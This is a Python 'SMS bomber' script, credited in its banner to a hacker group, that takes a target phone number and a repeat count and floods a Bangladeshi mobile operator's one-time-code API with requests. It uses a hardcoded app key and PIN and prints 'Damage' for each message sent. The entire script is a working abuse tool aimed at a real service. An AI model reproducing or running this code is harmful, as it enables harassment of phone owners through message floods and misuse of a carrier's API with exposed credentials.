import requests
from requests.structures import CaseInsensitiveDict

green = '\033[1;32m'
end = '\033[0m'
print (green+"""  _____ _   _ _ ____                 
 |_   _| | | (_) ___|                
   | | | |_| | \___ \                
   | | |  _  | |___) |               
   |_| |_| |_|_|____/                
  ____           _____    __  __     
 / ___| _   _ __|_   _|__|  \/  |    
 \___ \| | | / __|| |/ _ \ |\/| |    
  ___) | |_| \__ \| |  __/ |  | |    
 |____/ \__, |___/|_|\___|_|  |_|    
   ____ |___/         _____          
  / ___|_ __ ___  __ |_   _|__  _ __ 
 | |   | '__/ _ \/ _` || |/ _ \| '__|
 | |___| | |  __/ (_| || | (_) | |   
  \____|_|  \___|\__,_||_|\___/|_|   
  ____                               
 | __ ) _   _                        
 |  _ \| | | |                       
 | |_) | |_| |                       
 |____/ \__, |                       
        |___/                        
        ____  _   _       _   _      
   __ _|  _ \| \ | | __ _| \ | |     
  / _` | | | |  \| |/ _` |  \| |     
 | (_| | |_| | |\  | (_| | |\  |     
  \__,_|____/|_| \_|\__,_|_| \_|     
  _   _       ____  _ ____           
 | | | | __ _| __ )(_) __ )          
 | |_| |/ _` |  _ \| |  _ \          
 |  _  | (_| | |_) | | |_) |         
 |_| |_|\__,_|____/|_|____/          
   __   _  ___     __   ____         
  / /  | |/ _ \ _ _\ \ / /\ \        
 | |_  | | | | | '_ \ V /  | |       
 | | |_| | |_| | | | | |   | |       
 | |\___/ \___/|_| |_|_|   | |       
  \_\                     /_/        """+end)

# CVALUE
blue = '\33[94m'
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan = "\033[96m"
end = '\033[0m'
print ("\033[32m")

print ("	 -!-!- WeLcOmE-!-!- (SiiLenT HunTer TeaM ) ")

print ("	 -!-!- WeLcOmE-!-!- ( HD-JonY ) ( @##MrZoN!!##@) ")


number=str(input('[>] Enter Your Target Number:'))
url = "https://circle.robi.com.bd/mylife/appapi/appcall.php?op=getOTC&pin=21799&app_version=78&msisdn=88"+number

headers = CaseInsensitiveDict()
headers["x-app-key"] = "000oc0so48owkw4s0wwo4c00g00804w80gwkw8kg"
headers["User-Agent"]="gzip"
headers["Content-Type"] = "application/x-www-from-url"
data = "op=getOTC&pin=21799&app_version=78&msisdn=78"+number

amount=int(input('[>] Enter Your Target Amount:'))

for i in range(amount):
	x = requests.post(url, headers=headers)
	print(str(i+1)+' Damage\n')
	
proxies	=	{
	'https':	'62.193.8.192:3428'
}
response	=	requests.get("https://ipinfo.io/json")

print(response.json() [ 'country'] )

print(response.json() [ 'region'] )